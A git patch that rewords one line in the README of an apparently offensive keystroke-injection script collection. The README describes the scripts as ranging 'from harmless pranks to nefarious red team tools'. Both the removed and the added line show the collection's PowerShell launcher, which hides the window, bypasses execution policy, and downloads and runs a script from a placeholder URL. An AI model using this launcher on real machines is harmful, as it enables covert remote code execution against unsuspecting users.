From f4bfaf257c90659a85b33fe7015cf6ec00b8e605 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 17 Jul 2023 15:45:42 +0000 Subject: [PATCH] Update README.md --- Fast-Execution-Scripts/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Fast-Execution-Scripts/README.md b/Fast-Execution-Scripts/README.md index ddaf19c..b076268 100644 --- a/Fast-Execution-Scripts/README.md +++ b/Fast-Execution-Scripts/README.md @@ -4,7 +4,7 @@ https://github.com/beigeworm/assets/tree/main/Scripts -they all use this command > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` +They use this cmd > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` These scripts range from harmless pranks to nefarious red team tools. For educational purposes only!